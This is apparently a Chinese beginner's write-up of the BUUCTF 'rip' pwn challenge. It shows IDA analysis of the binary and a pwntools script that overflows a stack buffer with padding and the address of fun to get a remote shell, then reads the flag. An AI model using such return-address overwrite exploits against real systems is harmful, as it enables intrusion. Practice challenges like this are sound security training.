当前位置: 首页 > news >正文

题目:BUUCTF之rip(pwn)

news 2025/8/2 20:31:13

网址

BUUCTF在线评测https://buuoj.cn/challenges#rip打开,如图所示

提示:先别启动靶机,靶机可以最后在启动,先分析下载的附件pwn1。

点击下载,下载完成之后,该文件后缀类型改为exe(就是将pwn1重命名为pwn1.exe)然后拖到IDA64.exe中。(我不知道后缀类型到底要不要改,网上很多教程都没讲清楚,然后我看了一下ida能打开的文件基本上都是exe的,我就自己改了)

注意:做pwn题目基本都要用到IDA跟虚拟机(Linux),所以要提前装好。

ida有很多版本,找一个能用的就行

ida及其相关资源网址(尽量找一些绿色网址下载)

IDA Pro入门指南:静态反编译神器的安装与使用详解-CSDN博客https://blog.csdn.net/qq_47403671/article/details/119939585逆向工具——IDA Pro的使用,从零基础到精通,收藏这篇就够了!_ida pro使用教程-CSDN博客https://blog.csdn.net/Python_0011/article/details/146866529IDA Pro 9.0 (macOS, Linux, Windows) - 强大的反汇编程序、反编译器和多功能调试器 - sysin - 博客园https://www.cnblogs.com/sysin/p/18639073我安装的是下面这个

[IDA] 加密与解密-ida的下载及详细安装过程(附有下载文件)_ida下载-CSDN博客https://blog.csdn.net/2301_77946674/article/details/141942756拖到ida64.exe中后有一些选项,默认就行了

打开后差不多是这样(我这里已经做完了,不知道怎么恢复原状)

如果不是这样的,双击左侧Functions window下的main,就变成这样了,再按F5(有些好像是F12),总之一定要出现一下界面

再双击变量S,就是第六行的括号中的S,出现以下界面就可以了

注意到右边两个蓝色S,观察到S左边由0变到F,一共是十六位,不管有什么用,先记下来。

双击左侧fun,得到以下界面(注意看栏目)

如果是以下界面,请按F5(或其他)

拖动分界线,记录fun函数内存地址0x401186

最后编写exp(我不会,借鉴别人的)

# 导入 pwntools 模块
from pwn import *# 和靶机进行连接 
r = remote("node4.buuoj.cn",26817)#这里双引号里面的替换成自己所启动靶机的,端口26817一样替换为自己靶机的# 定义fun函数的内存地址
fun_addr = 0x401187# 定义payload,一共需要十六进制f(16)个字节数据a,需要8个十进制字节数据(b),这些都是垃圾数据
# 最后加上p64函数转换的fun函数的地址
payload = (b"a" * 0xf) + (b"b" * 8) + p64(fun_addr)# 发送payload
r.sendline(payload)# 获取靶机交互式终端
r.interactive()

最后使用python运行,建议在虚拟机上操作。Windows上应该也可以

python 1.py #这里1.py替换成自己编写的python文件

我实在Ubuntu虚拟机上操作的,如图所示

输入ls(Linux ls(英文全拼: list directory contents)命令用于显示指定工作目录下之内容(列出目前工作目录所含的文件及子目录)。)

观察到特殊文件(或文件夹)flag,再次输入cat flag ,结果如图所示

得出flag

只不过我的虚拟机好像有点问题,在虚拟机中复制,却在主机上粘贴不了,害得我只能一个个敲出来。

注意

cat(英文全拼:concatenate)命令用于连接文件并打印到标准输出设备上,它的主要作用是用于查看和连接文件

其他,有需求请看以下网址内容

参考网址

BUUCTF-pwn-rip(第一个栈溢出) - Junglezt - 博客园https://www.cnblogs.com/Junglezt/p/17871927.htmlBUUCTF (PWN) RIP详细分析_buuctf rip pwn 解法-CSDN博客https://blog.csdn.net/qy201706/article/details/105397766buuctf rip 详细wp - refrain-again - 博客园https://www.cnblogs.com/refrain-again/p/15001283.htmlpwn学习(3)BUUCTF-rip - 技术栈https://jishuzhan.net/article/1704828218214715393

http://www.dtcms.com/a/308770.html

相关文章:

  • [算法]Leetcode3487
  • 【高等数学】第七章 微分方程——第五节 可降阶的高阶微分方程
  • 第三章·数据链路层
  • 前端路由深度解析:Hash 模式 vs. History 模式
  • 数字化应急预案:构筑现代安全防线
  • 实时语音流分段识别技术解析:基于WebRTC VAD的智能分割策略
  • MySQL 中的事务隔离级别有哪些?分别解决什么问题?
  • 图结构知识构造方法详解 ——面向垂直领域的高效知识库构建方案
  • CentOS 7 编译 Redis 6.x 完整教程(解决 GCC 版本不支持 C11)
  • lesson29:Python元类与抽象类深度解析:从接口定义到元编程实践
  • mysql 日志机制
  • Java 接口(上)
  • 哈希相关的模拟实现
  • 04百融云策略引擎项目laravel实战步完整安装composer及tcpdf依赖库和验证-优雅草卓伊凡
  • 常用的ROS(Robot Operating System,机器人操作系统)包,用于机器人软件开发的工具和库
  • isasssim robotiq夹爪踩坑
  • 同个主机拉取不同权限仓库的方法
  • 疯狂星期四文案网第25天运营日记
  • Product Hunt 每日热榜 | 2025-07-31
  • 零信任网络概念及在网络安全中的应用
  • 2025年渗透测试面试题总结-2025年HW(护网面试) 80(题目+回答)
  • 高等教育领域:依托VR教育服务,推动科研与教学的创新性发展
  • 智慧安防徘徊识别误报率↓77%:陌讯时序 - 空间融合算法实战解析
  • thinkphp3.2 中使用redis
  • LeetCode 面试经典 150_数组/字符串_买卖股票的最佳时机(7_121_C++_简单)(贪心)
  • 常见的中间件漏洞练习教程
  • Druid数据库连接池
  • 网安学习NO.20
  • vue 开发总结:从安装到第一个交互页面-与数据库API
  • 5G-A技术浪潮勾勒通信产业新局,微美全息加快以“5.5G+ AI”新势能深化场景应用